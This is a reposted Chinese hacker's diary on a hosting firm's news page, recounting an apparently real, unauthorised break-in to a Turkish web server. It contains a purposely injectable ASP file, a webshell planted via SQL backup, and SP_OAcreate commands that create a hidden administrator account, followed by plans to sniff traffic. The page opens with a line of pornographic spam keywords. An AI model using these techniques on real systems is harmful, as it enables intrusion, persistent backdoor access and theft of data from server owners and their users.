五月综合激情婷婷六月,日韩欧美国产一区不卡,他扒开我内裤强吻我下面视频 ,无套内射无矿码免费看黄,天天躁,日日躁,狠狠躁

新聞動態(tài)

入侵土耳其網(wǎng)站實例

發(fā)布日期:2021-12-26 08:39 | 文章來源:gibhub
打開SQL用查詢分析器連上,發(fā)現(xiàn)了幾個數(shù)據(jù)庫估計是服務器的幾個網(wǎng)站共用的這一個SQL server 于是立刻本地構造一個注射點,準備列目錄。 構造注射點代碼如下:
<%
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "PROVIDER=SQLOLEDB;DATA SOURCE=212.175.236.XXXX;UID=aXXXXX;pwd=XXXX;DATABASE=XXXX"
%>


我隱藏掉了真實的用戶跟密碼。。這里我說下怎么利用這個MSSQL的用戶名和密碼。首先我們構造一個有注射漏洞的文件sql.asp,代碼如下:


<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL ="select * from PE_GuestBook where GuestID=" & id
rs.open strSQL,conn,1,3
rs.close
%>



這里我們可以看到,直接用request("id") 取值沒有過濾就構成了注入漏洞。我們在最前面加上,就是這個文件包含了conn.asp,把這兩個文件放在同一目錄下。這里我在本機架設放在WEB目錄下,用啊D檢測一下,地址為http://127.0.0.1/sql.asp?id=1。因為sql.asp明顯有注射漏洞,再包含conn.asp,所以一檢測1就有注射點了,如圖1



PS:如果看過我以前文章的朋友肯定會覺的熟悉吧 ,因為這招我已經(jīng)用過了,呵呵這里再寫一次一個是為了自己復習下,一個也是為了給不會的朋友再說下。

既然是DB權限我們最常用的就是列目錄然后備份獲得WEBSHELL了吧?嘿嘿。找了半天終于在D:\Inetpub\sevi發(fā)現(xiàn)了網(wǎng)站的根目錄,為了防止出錯我還多試了幾遍,確定是WEB目錄后馬上使用SQL備份之..這里語句我就不寫了,上次滲透黑客風云的文章里寫了很大的篇幅,不懂的朋友可以自己去看下,因為偶們直接用語句備份,所以成功的備份個小馬上去 如圖2 3







傳上大馬之后發(fā)現(xiàn)服務器竟然不支持中文..看起來很不舒服。不過能瀏覽一些盤,看了下WEB目錄服務器上共有7。8個網(wǎng)站 都可以瀏覽,隨便看了個站發(fā)現(xiàn)了一個SQL密碼竟然跟我的是不一樣的,于是重新用SQL連上,發(fā)現(xiàn)這回竟然是SA權限 如圖4



但是在用xp_cmdshell存儲過程執(zhí)行命令的時候發(fā)現(xiàn)管理員把xplog70.dll給刪掉了,我日。

但是沒關系 偶們還有SP_OAcreate可以用 用SP_OAcreate一樣可以執(zhí)行系統(tǒng)命令

在查詢分析器里執(zhí)行

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD

@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user godyhook hook /add'

就是利用SP_OAcreate來添加一個godyhook的系統(tǒng)用戶 然后直接提升為管理員權限就OK了

提示命令完成成功 說明SP_OAcreate并沒有被刪除 如圖5



但是連上終端的時候卻提示我沒有進入桌面的權限,著實郁悶了半天。后來好半天才想起來只是加了用戶 但是并沒有把

用戶提升到管理員組,暈 真是大意

馬上執(zhí)行

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD

@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net localgroup administratos godyhook /add'

然后再連一下 發(fā)現(xiàn)成功進入服務器鳥..看了下 網(wǎng)站有幾個 哈哈 如圖

然后上傳一個cain到服務器上 準備開始偶們的sniffer 哈哈. 文章著實沒什么技術含量 也就是普通的入侵日記。 本來還有幾篇文章的因為雜志的原因暫時不能發(fā)出來 嘿嘿

總結:對于拿到MSSQL帳號找WEB目錄,可以利用玫瑰滲透PCSHARE的方法,快速查找!








版權聲明:本站文章來源標注為YINGSOO的內(nèi)容版權均為本站所有,歡迎引用、轉載,請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站,禁止在非maisonbaluchon.cn所屬的服務器上建立鏡像,否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學習參考,不代表本站立場,如有內(nèi)容涉嫌侵權,請聯(lián)系alex-e#qq.com處理。

相關文章

實時開通

自選配置、實時開通

免備案

全球線路精選!

全天候客戶服務

7x24全年不間斷在線

專屬顧問服務

1對1客戶咨詢顧問

在線
客服

在線客服:7*24小時在線

客服
熱線

400-630-3752
7*24小時客服服務熱線

關注
微信

關注官方微信
頂部